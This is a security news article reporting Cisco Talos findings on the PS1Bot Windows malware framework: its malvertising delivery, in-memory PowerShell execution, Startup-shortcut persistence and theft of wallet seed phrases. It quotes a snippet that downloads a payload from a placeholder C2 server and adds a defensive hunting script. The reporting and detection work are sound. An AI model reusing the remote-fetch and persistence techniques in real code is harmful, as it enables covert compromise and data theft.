A sophisticated new malware campaign targeting Windows systems has emerged, using a multi-stage framework dubbed "PS1Bot" that combines PowerShell and C# components to conduct extensive information theft operations.
The malware represents a significant evolution in attack methodology, employing a modular architecture and in-memory execution techniques to evade traditional detection mechanisms while maintaining persistent access to compromised systems.
PS1Bot operates through malvertising campaigns that deliver compressed archives with filenames designed to match search engine optimization (SEO) patterns, such as "chapter 8 medicare benefit policy manual.zip" and "Counting Canadian Money Worksheets Pdf.zip.e49".
These seemingly legitimate files contain a JavaScript downloader named "FULL DOCUMENT.js" that initiates the infection chain by retrieving additional malicious components from attacker-controlled servers.
The malware's modular design allows threat actors to deploy various specialized components on demand, including information stealers, keyloggers, screen capture tools, and persistence mechanisms.
Cisco Talos analysts noted that PS1Bot has been extremely active throughout 2025, with new samples observed consistently, indicating ongoing development and refinement of the framework.
Figure: Deobfuscating the downloader script (Source – Cisco Talos)
What distinguishes PS1Bot from conventional malware is its emphasis on stealth through a minimal disk footprint and extensive use of in-memory execution.
The framework leverages PowerShell's Invoke-Expression (IEX) functionality to dynamically execute modules without writing them to disk, significantly reducing the likelihood of detection by traditional antivirus solutions.
Sophisticated Persistence and Evasion Mechanisms
PS1Bot implements a particularly clever persistence technique that creates randomly named PowerShell scripts within the %PROGRAMDATA% directory alongside corresponding shortcut files.
The malware generates a malicious LNK file in the Windows Startup directory that points to these PowerShell scripts, ensuring reactivation after system reboots.
The persistence module retrieves obfuscated payloads from the command and control server's "/remodel" endpoint, as demonstrated in the following code structure:
$url = "http://[C2_SERVER]/remodel"
$content = (New-Object Net.WebClient).DownloadString($url)
# Content is then deobfuscated and written to a randomly-named PS1 file
This payload contains the same C2 polling logic used in the initial infection, creating a self-perpetuating cycle.
The malware constructs unique communication URLs using the infected system's C: drive serial number, enabling individualized tracking of compromised machines while maintaining operational security.
The framework's information theft capabilities are particularly concerning, targeting cryptocurrency wallets through embedded wordlists containing seed phrase combinations in multiple languages.
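The persistence chain described above (a shortcut in a Startup folder launching a randomly named .ps1 under %PROGRAMDATA%) is something a defender can hunt for directly. The following read-only PowerShell script is an added example written for this article, not code from the original report or from Cisco Talos; it assumes the shortcut targets powershell.exe or pwsh and references a .ps1 path under the ProgramData folder, and it uses the WScript.Shell COM object to read shortcut targets.

```powershell
# Added example: hunt for Startup-folder shortcuts that launch a PowerShell
# script stored under %PROGRAMDATA%, the persistence pattern described above.
# Run from an elevated PowerShell prompt on a Windows host; it only reads.

$startupDirs = @(
    [Environment]::GetFolderPath('Startup'),        # current user's Startup folder
    [Environment]::GetFolderPath('CommonStartup')   # all-users Startup folder
)
$programData = [Environment]::GetFolderPath('CommonApplicationData')  # usually C:\ProgramData
$shell = New-Object -ComObject WScript.Shell
$findings = @()

foreach ($dir in $startupDirs) {
    if (-not (Test-Path $dir)) { continue }
    foreach ($lnk in Get-ChildItem -Path $dir -Filter *.lnk -File -ErrorAction SilentlyContinue) {
        $sc = $shell.CreateShortcut($lnk.FullName)
        $target = "$($sc.TargetPath) $($sc.Arguments)"
        # Two signals: the shortcut launches PowerShell, and it references a .ps1
        # under ProgramData. Either alone is noisy; both together is worth triage.
        $launchesPs = $target -match '(?i)powershell(\.exe)?|pwsh'
        $ps1UnderProgramData = $target -match ('(?i)' + [regex]::Escape($programData) + '\\[^"\s]+\.ps1')
        if ($launchesPs -and $ps1UnderProgramData) {
            $findings += [pscustomobject]@{
                Shortcut = $lnk.FullName
                Created  = $lnk.CreationTime
                Target   = $target.Trim()
            }
        }
    }
}

# The script itself is also an artifact: list .ps1 files written directly into
# ProgramData recently, since the malware drops a randomly named one there.
$recentScripts = Get-ChildItem -Path $programData -Filter *.ps1 -File -ErrorAction SilentlyContinue |
    Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-30) } |
    Select-Object FullName, LastWriteTime, Length

if ($findings.Count -eq 0 -and -not $recentScripts) {
    Write-Output 'No Startup shortcut -> ProgramData .ps1 chain found.'
} else {
    $findings | Format-List
    $recentScripts | Format-Table -AutoSize
}
```

Any hit should be cross-checked against the shortcut's creation time and the referenced script's contents before removal, since legitimate software occasionally uses the same folders.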
Figure: Example HTTP POST containing a Base64-encoded screenshot image file (Source – Cisco Talos)
PS1Bot scans the file system for documents containing wallet recovery phrases and password files, compressing and exfiltrating this sensitive data via HTTP POST requests to attacker infrastructure.
Cisco Talos researchers identified significant code similarities between PS1Bot and previously reported malware families, including AHK Bot and components associated with Skitnet campaigns, suggesting potential shared development resources or threat actor collaboration across these operations.